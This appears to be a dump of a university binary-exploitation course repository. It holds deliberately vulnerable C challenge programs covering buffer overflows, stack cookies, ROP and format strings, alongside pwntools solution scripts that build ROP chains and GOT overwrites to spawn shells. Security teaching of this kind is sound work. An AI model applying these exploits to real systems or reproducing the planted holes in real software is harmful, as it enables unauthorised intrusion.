| 15 | def sub_space(string): 16 | ret = '' 17 | for c in string: 18 | ret += chr((ord(c)-0x20 + 0x100)&0xff) 19 | return ret 20 | 21 | 22 | def rev_main(): 23 | string = raw_input() 24 | r3 = int(string, 16) 25 | print r3 26 | i1 = str(r3) 27 | print i1 28 | r2 = sub_space(i1) 29 | print r2 30 | r1 = memfrob(r2) 31 | print r1 32 | 33 | def main(): 34 | string = raw_input() 35 | 36 | r1 = memfrob(string) 37 | print r1 38 | r2 = add_space(r1) 39 | print r2 40 | 41 | i1 = int(r2) 42 | print i1 43 | r3 = "%x" % i1 44 | print r3 45 | 46 | 47 | if __name__ == '__main__': 48 | rev_main() 49 | main() 50 | -------------------------------------------------------------------------------- /src/week1/challenges/level7/test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | def memfrob(string): 4 | ret = '' 5 | for c in string: 6 | ret += chr(ord(c)^42) 7 | return ret 8 | 9 | def add_space(string): 10 | ret = '' 11 | for c in string: 12 | ret += chr((ord(c)+0x20)&0xff) 13 | return ret 14 | 15 | def sub_space(string): 16 | ret = '' 17 | for c in string: 18 | ret += chr((ord(c)-0x20 + 0x100)&0xff) 19 | return ret 20 | 21 | 22 | def rev_main(): 23 | string = raw_input() 24 | r3 = int(string, 16) 25 | print r3 26 | i1 = str(r3) 27 | print i1 28 | r2 = sub_space(i1) 29 | print r2 30 | r1 = memfrob(r2) 31 | print r1 32 | 33 | def main(): 34 | string = raw_input() 35 | 36 | r1 = memfrob(string) 37 | print r1 38 | r2 = add_space(r1) 39 | print r2 40 | 41 | i1 = int(r2) 42 | print i1 43 | r3 = "%x" % i1 44 | print r3 45 | 46 | 47 | if __name__ == '__main__': 48 | rev_main() 49 | main() 50 | -------------------------------------------------------------------------------- /src/week1/challenges/level3/level3.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | uint64_t result; 9 | 10 | void get_a_shell() { 11 | printf("Spawning a privileged shell\n"); 12 | setregid(getegid(), getegid()); 13 | execl("/bin/bash", "bash", NULL); 14 | } 15 | 16 | void get() { 17 | result = 0; 18 | uint32_t value; 19 | for(int i=0; i<5; ++i) { 20 | printf("Please give me your integer %d\n", i+1); 21 | scanf("%u", &value); 22 | result += i * value; 23 | } 24 | } 25 | void calculate() { 26 | if(result == 0x11223344ul) { 27 | printf("Correct!\n"); 28 | get_a_shell(); 29 | } 30 | else { 31 | printf("Wrong value %llu!!\n", result); 32 | } 33 | } 34 | 35 | 36 | int main() { 37 | 38 | printf("Let's start a game of five integers!\n"); 39 | printf("I do not let you know what I am doing internally!\n"); 40 | get(); 41 | calculate(); 42 | } 43 | -------------------------------------------------------------------------------- /src/week4/challenges/6-stack-cookie-4/stack-cookie-4.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // Please check the assembly for the correct buffer size 7 | #ifndef BUFSIZE 8 | #define BUFSIZE 128 9 | #endif 10 | 11 | #include 12 | 13 | __attribute__((constructor)) 14 | static void set_dumpable() { 15 | prctl(PR_SET_DUMPABLE, 1); 16 | } 17 | 18 | char g_buf[BUFSIZE * 2]; 19 | 20 | int input_func(int a) { 21 | // name buffer to overflow 22 | int length = 0; 23 | char buf[BUFSIZE]; 24 | int *i = (int*)(&buf[BUFSIZE]); // overwrite this variable! 25 | printf("Please type your name: \n"); 26 | length = read(0, g_buf, BUFSIZE * 2); 27 | for(*i=0; *i 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 30 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | uint32_t eip; 18 | 19 | __attribute__((optimize("-O2"))) int input_func() { 20 | // name buffer to overflow 21 | char buf[BUFSIZE]; 22 | printf("Your buffer is at: %p\n", buf); 23 | printf("Please type your name: \n"); 24 | read(0, buf, 0x26 * 2); 25 | 26 | printf("Hello %s\n!", buf); 27 | 28 | asm volatile("mov 0x4(%%ebp), %0" : "=r"(eip) ::); 29 | if((eip & 0xfffff000) != 0x8048000) { 30 | printf("Your changed EIP is at %p. I only accept the address that starts with 0x8048XXX\n", eip); 31 | exit(-1); 32 | } 33 | printf("EIP is %p\n", eip); 34 | return 0; 35 | } 36 | 37 | int main(int argc, char** argv, char** envp) { 38 | input_func(); 39 | return 0; 40 | } 41 | -------------------------------------------------------------------------------- /solutions/week6/sr-1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | offset_to_libc_start_main = 0xe8 - 0x30 6 | 7 | p = process("./sr-1") 8 | #gdb.attach(p, "b *input_func+110") 9 | 10 | print(p.recv()) 11 | 12 | p.sendline(str(offset_to_libc_start_main+8)) 13 | 14 | data = p.recv() 15 | 16 | print(repr(data)) 17 | 18 | libc_start_main = u64(data[offset_to_libc_start_main:offset_to_libc_start_main+8]) 19 | 20 | print(hex(libc_start_main)) 21 | 22 | """ 23 | 0x7ffff7a2d830 (__libc_start_main+240) 24 | 0x7ffff7ad9a20 <__GI_execl> 25 | """ 26 | 27 | execl = libc_start_main + 0x7ffff7ad9a20 - 0x7ffff7a2d830 28 | 29 | print(hex(execl)) 30 | 31 | """ 32 | 0x400020: "@" 33 | 0x0000000000400783 : pop rdi ; ret 34 | 0x0000000000400781 : pop rsi ; pop r15 ; ret 35 | """ 36 | pop_rdi_ret = 0x400783 37 | pop_rsi_r15_ret = 0x400781 38 | buf = "A" * 0x88 39 | buf += p64(pop_rdi_ret) 40 | buf += p64(0x400020) 41 | buf += p64(pop_rsi_r15_ret) 42 | buf += p64(0) 43 | buf += p64(0) 44 | buf += p64(execl) 45 | 46 | p.sendline(buf) 47 | 48 | p.interactive() 49 | -------------------------------------------------------------------------------- /src/week7/challenges/run-command/run-command.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | char command[256]; 9 | char user_args[64]; 10 | 11 | char *bad_characters = "./;|&`"; 12 | 13 | void 14 | check_input(char *user_input) { 15 | int len = strlen(user_input); 16 | int len2 = strlen(bad_characters); 17 | for (int i=0; i print printf 22 | $1 = {} 0x7ffff7a62800 <__printf> 23 | pwndbg> print execl 24 | $2 = {} 0x7ffff7ad9a20 <__GI_execl> 25 | pwndbg> x/s 0x400020 26 | 0x400020: "@" 27 | """ 28 | 29 | execl_addr = printf_addr - 0x7ffff7a62800 + 0x7ffff7ad9a20 30 | 31 | """ 32 | 0x0000000000400a33 : pop rdi ; ret 33 | 0x0000000000400a31 : pop rsi ; pop r15 ; ret 34 | """ 35 | pop_rdi_ret = 0x400a33 36 | pop_rsi_r15_ret = 0x400a31 37 | 38 | buf = "A" * 0x88 39 | buf += p64(pop_rdi_ret) 40 | buf += p64(0x400020) 41 | buf += p64(pop_rsi_r15_ret) 42 | buf += p64(0) 43 | buf += p64(0) 44 | buf += p64(execl_addr) 45 | 46 | p.sendline(buf) 47 | 48 | p.interactive() 49 | -------------------------------------------------------------------------------- /src/week4/challenges/3-stack-cookie-1/stack-cookie-1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #ifndef BUFSIZE 6 | #define BUFSIZE 30 7 | #endif 8 | 9 | #include 10 | 11 | __attribute__((constructor)) 12 | static void set_dumpable() { 13 | prctl(PR_SET_DUMPABLE, 1); 14 | } 15 | 16 | int stack_cookie = 0xfaceb00c; 17 | int retrieved_cookie = 0; 18 | 19 | __attribute__((optimize("-O2"))) int input_func(int a) { 20 | // name buffer to overflow 21 | asm volatile("mov %0, -0x4(%%ebp)"::"r"(stack_cookie):); 22 | char buf[BUFSIZE]; 23 | printf("Please type your name: \n"); 24 | // OVERFLOW!!! 25 | read(0, buf, BUFSIZE * 2); 26 | 27 | printf("Hello %s!\n", buf); 28 | 29 | asm volatile("mov -0x4(%%ebp), %0":"=r"(retrieved_cookie)::); 30 | 31 | if(retrieved_cookie != stack_cookie) { 32 | printf("Stack smash detected!\n"); 33 | exit(-1); 34 | } 35 | return 0; 36 | } 37 | 38 | int non_main_func(void) { 39 | int a = 0; 40 | return input_func(a); 41 | } 42 | 43 | int main(int argc, char** argv, char** envp) { 44 | non_main_func(); 45 | return 0; 46 | } 47 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level0/bof-level0.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | void get_a_shell() { 8 | printf("Spawning a privileged shell\n"); 9 | setregid(getegid(), getegid()); 10 | execl("/bin/bash", "bash", NULL); 11 | } 12 | 13 | void receive_input() { 14 | int a = 0x41414141, b = 0x42424242; 15 | char buf[20]; 16 | 17 | printf("Values in two local variables are:\n" 18 | "a = 0x%08x and b = 0x%08x\n", a, b); 19 | 20 | printf("Can you change these values to:\n" 21 | "a = 0x48474645 and b = 0x44434241?\n"); 22 | 23 | printf("Type YES if you agree with this... " 24 | "(a fake message, you may overflow the input buffer).\n"); 25 | fgets(buf, 128, stdin); 26 | 27 | printf("Now the variables store:\n" 28 | "a = 0x%08x b = 0x%08x\n", a, b); 29 | 30 | if(a == 0x48474645 && b == 0x44434241) { 31 | printf("Great!\n"); 32 | get_a_shell(); 33 | } 34 | else { 35 | printf("Analyze the program!\n"); 36 | } 37 | } 38 | 39 | int main() { 40 | receive_input(); 41 | } 42 | -------------------------------------------------------------------------------- /src/week1/challenges/level8/level8.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #define _GNU_SOURCE 4 | #include 5 | #include 6 | 7 | #include 8 | #include 9 | 10 | void get_a_shell() { 11 | printf("Spawning a privileged shell\n"); 12 | setregid(getegid(), getegid()); 13 | execl("/bin/bash", "bash", NULL); 14 | } 15 | 16 | 17 | int keys[] = { 3, 4 }; 18 | 19 | void password() { 20 | printf("THREE FOUR MACHINES\n"); 21 | int value = rand() % 20 + 15; 22 | int answer; 23 | 24 | printf("I will use %d for my lucky number.\n", value); 25 | printf("Please send me your lucky number.\n"); 26 | scanf("%d", &answer); 27 | 28 | for(int i=0; i 2 | #include 3 | #include 4 | 5 | 6 | // Please check the assembly for the correct buffer size 7 | #ifndef BUFSIZE 8 | #define BUFSIZE 128 9 | #endif 10 | 11 | #include 12 | 13 | // for core dump 14 | __attribute__((constructor)) 15 | static void set_dumpable() { 16 | prctl(PR_SET_DUMPABLE, 1); 17 | } 18 | 19 | 20 | // Executing some_function will do nothing for you ;) 21 | int some_function() { 22 | setregid(-1, -1); 23 | execve(NULL, 0, 0); 24 | } 25 | 26 | void input_func() { 27 | // name buffer to overflow 28 | char buf[BUFSIZE]; 29 | 30 | printf("Please call setregid(gid, gid);\n"); 31 | printf("You can check the gid by running 'cat /etc/group'\n"); 32 | printf("For example, the gid of week5-50000-ok is 50000\n"); 33 | printf("And then call execve(\"/bin/sh\", 0, 0)\n"); 34 | printf("Or you can use a symlink\n"); 35 | printf("Please type your name: \n"); 36 | read(0, buf, BUFSIZE * 2); 37 | 38 | printf("Hello %s!\n", buf); 39 | return; 40 | } 41 | 42 | int main(int argc, char** argv, char** envp) { 43 | input_func(); 44 | return 0; 45 | } 46 | -------------------------------------------------------------------------------- /solutions/week5/rop-5-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./rop-leak-got-32") 6 | 7 | e = ELF('/lib32/libc.so.6') 8 | puts_offset = e.symbols['puts'] 9 | execve_offset = e.symbols['execve'] 10 | 11 | offset_diff = execve_offset - puts_offset 12 | 13 | input_func = p.elf.symbols['input_func'] 14 | printf_func = p.elf.symbols['printf'] 15 | strcpy_func = p.elf.symbols['strcpy'] 16 | 17 | print p.recvline() 18 | 19 | puts_got = 0x0804a014 20 | 21 | template = "A" * 0x88 + "BBBB" 22 | 23 | payload = template 24 | 25 | payload += p32(printf_func) + p32(input_func) + p32(puts_got) 26 | 27 | p.send(payload) 28 | 29 | print p.recvline() 30 | print p.recvline() 31 | 32 | data = p.recv(0x100) 33 | 34 | libc_puts = u32(data[0:4]) 35 | print(hex(libc_puts)) 36 | print(hex(puts_offset)) 37 | libc_execve = libc_puts + offset_diff 38 | 39 | payload = template 40 | payload += p32(libc_execve) + p32(0) + p32(0x804856c) + p32(0) + p32(0) 41 | 42 | import os 43 | if not os.path.exists("\xb8"): 44 | os.symlink("sh", "\xb8") 45 | 46 | with open('exploit.txt', 'wb') as f: 47 | f.write(payload) 48 | 49 | p.send(payload) 50 | p.interactive() 51 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-64/rop-1-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | // Please check the assembly for the correct buffer size 7 | #ifndef BUFSIZE 8 | #define BUFSIZE 128 9 | #endif 10 | 11 | #include 12 | 13 | // for core dump 14 | __attribute__((constructor)) 15 | static void set_dumpable() { 16 | prctl(PR_SET_DUMPABLE, 1); 17 | } 18 | 19 | 20 | // Executing some_function will do nothing for you ;) 21 | int some_function() { 22 | setregid(-1, -1); 23 | execve(NULL, 0, 0); 24 | asm volatile("pop %rdx;"); 25 | } 26 | 27 | void input_func() { 28 | // name buffer to overflow 29 | char buf[BUFSIZE]; 30 | 31 | printf("Please call setregid(gid, gid);\n"); 32 | printf("You can check the gid by running 'cat /etc/group'\n"); 33 | printf("For example, the gid of week5-50001-ok is 50001\n"); 34 | printf("And then call execve(\"/bin/sh\", 0, 0)\n"); 35 | printf("Or you can use a symlink\n"); 36 | printf("Please type your name: \n"); 37 | read(0, buf, BUFSIZE * 2); 38 | 39 | printf("Hello %s!\n", buf); 40 | return; 41 | } 42 | 43 | int main(int argc, char** argv, char** envp) { 44 | input_func(); 45 | return 0; 46 | } 47 | -------------------------------------------------------------------------------- /src/week7/challenges/guess-passwd/guess-passwd.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define PASSWD "0000000000000000000" 8 | 9 | int main(int argc, char** argv) { 10 | char buf[512]; 11 | memset(buf, 0, 512); 12 | alarm(10); 13 | setvbuf(stdout, NULL, _IONBF, 0); 14 | setvbuf(stdin, NULL, _IONBF, 0); 15 | 16 | char *cur = PASSWD; 17 | char *end = PASSWD + strlen(PASSWD); 18 | 19 | /* mimic ubuntu */ 20 | printf("Ubuntu 18.04 bionic-beaver tty1\n"); 21 | printf("ubuntu login: root\n"); 22 | printf("password: "); 23 | 24 | for (; cur < end; cur ++) { 25 | int c = fgetc(stdin); 26 | if (c == '\n') 27 | break; 28 | /* short circuit */ 29 | if (*cur != c) { 30 | break; 31 | } 32 | /* HINT: this makes the challenge easy */ 33 | usleep(20000); 34 | } 35 | 36 | if (cur == end) { 37 | int fd = open("flag", O_RDONLY); 38 | read(fd, buf, 100); 39 | printf("%s\n", buf); 40 | } else { 41 | printf("Incorrect password!\n"); 42 | } 43 | 44 | return 0; 45 | } 46 | -------------------------------------------------------------------------------- /src/week7/challenges/guess-passwd/guess-passwd-real.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define PASSWD "sW33tC4ndYiSf0rcAND" 8 | 9 | int main(int argc, char** argv) { 10 | char buf[512]; 11 | memset(buf, 0, 512); 12 | alarm(10); 13 | setvbuf(stdout, NULL, _IONBF, 0); 14 | setvbuf(stdin, NULL, _IONBF, 0); 15 | 16 | char *cur = PASSWD; 17 | char *end = PASSWD + strlen(PASSWD); 18 | 19 | /* mimic ubuntu */ 20 | printf("Ubuntu 18.04 bionic-beaver tty1\n"); 21 | printf("ubuntu login: root\n"); 22 | printf("password: "); 23 | 24 | for (; cur < end; cur ++) { 25 | int c = fgetc(stdin); 26 | if (c == '\n') 27 | break; 28 | /* short circuit */ 29 | if (*cur != c) { 30 | break; 31 | } 32 | /* HINT: this makes the challenge easy */ 33 | usleep(20000); 34 | } 35 | 36 | if (cur == end) { 37 | int fd = open("flag", O_RDONLY); 38 | read(fd, buf, 100); 39 | printf("%s\n", buf); 40 | } else { 41 | printf("Incorrect password!\n"); 42 | } 43 | 44 | return 0; 45 | } 46 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level2/bof-level2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | void get_a_shell() { 8 | printf("Spawning a privileged shell\n"); 9 | setregid(getegid(), getegid()); 10 | execl("/bin/bash", "bash", NULL); 11 | } 12 | 13 | void receive_input() { 14 | int a = 0x41414141, b = 0x42424242; 15 | char buf[20]; 16 | 17 | printf("Values in two local variables are:\n" 18 | "a = 0x%08x and b = 0x%08x\n", a, b); 19 | 20 | printf("Can you change these values to:\n" 21 | "a = 0x48474645 and b = 0x44434241?\n"); 22 | 23 | printf("Type YES if you agree with this... " 24 | "(a fake message, you may overflow the input buffer).\n"); 25 | fgets(buf, 128, stdin); 26 | 27 | printf("Now the variables store:\n" 28 | "a = 0x%08x b = 0x%08x\n", a, b); 29 | 30 | if(a == 0x48474645 && b == 0x44434241) { 31 | printf("Great, but I will not execute get_a_shell() for you..\n"); 32 | printf("Run it yourself!\n"); 33 | } 34 | else { 35 | printf("Analyze the program!\n"); 36 | exit(-1); 37 | } 38 | } 39 | 40 | int main() { 41 | receive_input(); 42 | } 43 | -------------------------------------------------------------------------------- /solutions/week6/fs-code-exec-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | env = { 5 | 'PATH' : '.:/bin:/usr/bin' 6 | } 7 | 8 | p = process('fs-code-exec-64', env=env) 9 | puts_got = p.elf.got['puts'] 10 | printf_got = p.elf.got['printf'] 11 | print(hex(printf_got)) 12 | print(p.recv()) 13 | 14 | buf = '%7$sBBBB' + p64(puts_got) 15 | 16 | p.sendline(buf) 17 | 18 | data = p.recv() 19 | 20 | print(repr(data)) 21 | 22 | d = data.split(' ')[1][:6] + "\x00\x00" 23 | 24 | libc_puts = u64(d) 25 | 26 | print(hex(libc_puts)) 27 | 28 | """ 29 | $1 = {} 0x7ffff7a7c690 <_IO_puts> 30 | $2 = {} 0x7ffff7a52390 <__libc_system> 31 | """ 32 | 33 | libc_system = libc_puts - 0x7ffff7a7c690 + 0x7ffff7a52390 34 | 35 | first = libc_system & 0xffff 36 | second = ((libc_system >> 16) & 0xffff) - first 37 | while second < 0: 38 | second += 0x10000 39 | 40 | third = ((libc_system >> 32) & 0xffff) - second - first 41 | while third < 0: 42 | third += 0x10000 43 | 44 | 45 | buf = '%' + ('%05dx' % first) + '%11$hn' + '%' + ('%05dx' % second) + '%12$hn' + '%' + ('%05dx' % third) + '%13$hn' + 'A' + p64(printf_got) + p64(printf_got+2) + p64(printf_got+4) 46 | 47 | p.sendline(buf) 48 | 49 | p.interactive() 50 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-32/fs-code-exec-32.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | int read_random() { 18 | int fd = open("/dev/urandom", O_RDONLY); 19 | int ret; 20 | if(fd < 0) { 21 | printf("Error on opening random\n"); 22 | exit(-1); 23 | } 24 | read(fd, &ret, 4); 25 | return ret; 26 | } 27 | 28 | int global_random = 0; 29 | 30 | int input_func() { 31 | 32 | char name[1024]; 33 | printf("Please type your name first: \n"); 34 | // only reads 1023 chars at max 35 | read(0, name, 1023); 36 | printf("Hello "); 37 | printf(name); 38 | printf("\n"); 39 | 40 | printf("Please type your affiliation: \n"); 41 | // only reads 1023 chars at max 42 | read(0, name, 1023); 43 | printf("You are from: "); 44 | printf(name); 45 | printf("\n"); 46 | 47 | printf("Welcome %s!\n", name); 48 | 49 | return 0; 50 | } 51 | 52 | int main(int argc, char** argv, char** envp) { 53 | // Inherit EGID here.. 54 | setregid(getegid(), getegid()); 55 | input_func(); 56 | return 0; 57 | } 58 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-64/fs-code-exec-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | int read_random() { 18 | int fd = open("/dev/urandom", O_RDONLY); 19 | int ret; 20 | if(fd < 0) { 21 | printf("Error on opening random\n"); 22 | exit(-1); 23 | } 24 | read(fd, &ret, 4); 25 | return ret; 26 | } 27 | 28 | int global_random = 0; 29 | 30 | int input_func() { 31 | 32 | char name[1024]; 33 | printf("Please type your name first: \n"); 34 | // only reads 1023 chars at max 35 | read(0, name, 1023); 36 | printf("Hello "); 37 | printf(name); 38 | printf("\n"); 39 | 40 | printf("Please type your affiliation: \n"); 41 | // only reads 1023 chars at max 42 | read(0, name, 1023); 43 | printf("You are from: "); 44 | printf(name); 45 | printf("\n"); 46 | 47 | printf("Welcome %s!\n", name); 48 | 49 | return 0; 50 | } 51 | 52 | int main(int argc, char** argv, char** envp) { 53 | // Inherit EGID here.. 54 | setregid(getegid(), getegid()); 55 | input_func(); 56 | return 0; 57 | } 58 | -------------------------------------------------------------------------------- /src/week4/challenges/4-stack-cookie-2/stack-cookie-2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | // Please check the assembly for the correct buffer size 7 | #ifndef BUFSIZE 8 | #define BUFSIZE 128 9 | #endif 10 | 11 | #include 12 | 13 | __attribute__((constructor)) 14 | static void set_dumpable() { 15 | prctl(PR_SET_DUMPABLE, 1); 16 | } 17 | 18 | int stack_cookie = 0; 19 | int retrieved_cookie = 0; 20 | 21 | __attribute__((optimize("-O2"))) int input_func(int a) { 22 | // name buffer to overflow 23 | asm volatile("mov %0, -0x4(%%ebp)"::"r"(stack_cookie):); 24 | char buf[BUFSIZE]; 25 | printf("Please type your name: \n"); 26 | // OVERFLOW!!!!!! 27 | read(0, buf, BUFSIZE * 2); 28 | 29 | printf("Hello %s!\n", buf); 30 | 31 | asm volatile("mov -0x4(%%ebp), %0":"=r"(retrieved_cookie)::); 32 | 33 | if(retrieved_cookie != stack_cookie) { 34 | printf("Stack smash detected!\n"); 35 | exit(-1); 36 | } 37 | return 0; 38 | } 39 | 40 | int non_main_func(void) { 41 | int a = 0; 42 | return input_func(a); 43 | } 44 | 45 | int main(int argc, char** argv, char** envp) { 46 | srand((unsigned int)time(0)); 47 | // GUESS MY RANDOM! 48 | stack_cookie = rand(); 49 | non_main_func(); 50 | return 0; 51 | } 52 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-32/rop-4-32.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | 8 | // Please check the assembly for the correct buffer size 9 | #ifndef BUFSIZE 10 | #define BUFSIZE 128 11 | #endif 12 | 13 | #include 14 | 15 | // for core dump 16 | __attribute__((constructor)) 17 | static void set_dumpable() { 18 | prctl(PR_SET_DUMPABLE, 1); 19 | } 20 | 21 | char* strcpy(char *a, char *b) { 22 | while(*b) { 23 | *(a++) = *(b++); 24 | } 25 | *a = '\0'; 26 | return a; 27 | } 28 | 29 | void null() { 30 | open("a.txt", 0); 31 | #ifdef __x86_64__ 32 | asm volatile("pop %rdx"); 33 | #endif 34 | } 35 | 36 | 37 | void input_func() { 38 | // name buffer to overflow 39 | char buf[BUFSIZE]; 40 | printf("the quick brown fox jumps over the lazy dog!\n"); 41 | printf("I also put this for you: 1234567890-\n"); 42 | printf("Please type your name: \n"); 43 | read(0, buf, 4096); 44 | 45 | printf("Hello %s!\n", buf); 46 | return; 47 | } 48 | 49 | int main(int argc, char** argv, char** envp) { 50 | 51 | volatile char buf[4096]; 52 | 53 | // change the current directory to / 54 | chdir("/"); 55 | 56 | // disable PATH 57 | setenv("PATH", "/bin:/usr/bin", 1); 58 | input_func(); 59 | return 0; 60 | } 61 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-4-64/rop-4-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | 8 | // Please check the assembly for the correct buffer size 9 | #ifndef BUFSIZE 10 | #define BUFSIZE 128 11 | #endif 12 | 13 | #include 14 | 15 | // for core dump 16 | __attribute__((constructor)) 17 | static void set_dumpable() { 18 | prctl(PR_SET_DUMPABLE, 1); 19 | } 20 | 21 | char* strcpy(char *a, char *b) { 22 | while(*b) { 23 | *(a++) = *(b++); 24 | } 25 | *a = '\0'; 26 | return a; 27 | } 28 | 29 | void null() { 30 | open("a.txt", 0); 31 | #ifdef __x86_64__ 32 | asm volatile("pop %rdx"); 33 | #endif 34 | } 35 | 36 | 37 | void input_func() { 38 | // name buffer to overflow 39 | char buf[BUFSIZE]; 40 | printf("the quick brown fox jumps over the lazy dog!\n"); 41 | printf("I also put this for you: 1234567890-\n"); 42 | printf("Please type your name: \n"); 43 | read(0, buf, 4096); 44 | 45 | printf("Hello %s!\n", buf); 46 | return; 47 | } 48 | 49 | int main(int argc, char** argv, char** envp) { 50 | 51 | volatile char buf[4096]; 52 | 53 | // change the current directory to / 54 | chdir("/"); 55 | 56 | // disable PATH 57 | setenv("PATH", "/bin:/usr/bin", 1); 58 | input_func(); 59 | return 0; 60 | } 61 | -------------------------------------------------------------------------------- /src/week7/challenges/deprivileged/deprivileged.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int good_luck = 0; 7 | 8 | void 9 | hint(void) { 10 | char buf[32]; 11 | sprintf(buf, "/proc/%d/fd", getpid()); 12 | if(fork() == 0) { 13 | printf("Here's a hint for you!\n"); 14 | execl("/bin/ls", "ls", "-l", buf, NULL); 15 | // should never reach here! 16 | exit(-1); 17 | } 18 | else { 19 | waitpid(-1, NULL, 0); 20 | printf("Do you know how to hack this one?!\n"); 21 | } 22 | } 23 | 24 | void 25 | target(void) { 26 | char buf[32]; 27 | printf("Here is a buffer overflow vulnerability for you!\n"); 28 | read(0, buf, 512); 29 | printf("Hello %s!\n"); 30 | } 31 | 32 | int main() { 33 | // just use open for checking the existence of the file. 34 | int fd = open("good luck", O_RDONLY); 35 | 36 | if (fd >= 0) { 37 | printf("Oh, you have a file named good luck! Wish you good luck!\n"); 38 | printf("To see the hint correctly, please run './deprivileged-copy'\n"); 39 | hint(); 40 | } 41 | 42 | // deprivilege! Can you pwn this and read the flag? 43 | setregid(getgid(), getgid()); 44 | printf("My gid is %d, my egid is %d!\n", getgid(), getegid()); 45 | 46 | target(); 47 | } 48 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-write-32/fs-arbt-write-32.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | int read_random() { 18 | int fd = open("/dev/urandom", O_RDONLY); 19 | int ret; 20 | if(fd < 0) { 21 | printf("Error on opening random\n"); 22 | exit(-1); 23 | } 24 | read(fd, &ret, 4); 25 | return ret; 26 | } 27 | 28 | int global_random = 0; 29 | 30 | int input_func() { 31 | // global 32 | global_random = read_random(); 33 | 34 | char name[64]; 35 | printf("Please type your name first: \n"); 36 | // only reads 63 chars at max 37 | read(0, name, 63); 38 | printf("Hello "); 39 | printf(name); 40 | printf("\n"); 41 | 42 | if(global_random == 0xfaceb00c) { 43 | printf("Great!\n"); 44 | setregid(getegid(), getegid()); 45 | system("/bin/bash"); 46 | } 47 | else { 48 | printf("Wrong, your global_random is 0x%08x " 49 | "but I wish it to be: 0x%08x\n", 50 | global_random, 0xfaceb00c); 51 | exit(-1); 52 | } 53 | return 0; 54 | } 55 | 56 | int main(int argc, char** argv, char** envp) { 57 | input_func(); 58 | return 0; 59 | } 60 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-write-64/fs-arbt-write-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | int read_random() { 18 | int fd = open("/dev/urandom", O_RDONLY); 19 | int ret; 20 | if(fd < 0) { 21 | printf("Error on opening random\n"); 22 | exit(-1); 23 | } 24 | read(fd, &ret, 4); 25 | return ret; 26 | } 27 | 28 | int global_random = 0; 29 | 30 | int input_func() { 31 | // global 32 | global_random = read_random(); 33 | 34 | char name[64]; 35 | printf("Please type your name first: \n"); 36 | // only reads 63 chars at max 37 | read(0, name, 63); 38 | printf("Hello "); 39 | printf(name); 40 | printf("\n"); 41 | 42 | if(global_random == 0xfaceb00c) { 43 | printf("Great!\n"); 44 | setregid(getegid(), getegid()); 45 | system("/bin/bash"); 46 | } 47 | else { 48 | printf("Wrong, your global_random is 0x%08x " 49 | "but I wish it to be: 0x%08x\n", 50 | global_random, 0xfaceb00c); 51 | exit(-1); 52 | } 53 | return 0; 54 | } 55 | 56 | int main(int argc, char** argv, char** envp) { 57 | input_func(); 58 | return 0; 59 | } 60 | -------------------------------------------------------------------------------- /src/week1/challenges/level6/level6.c: 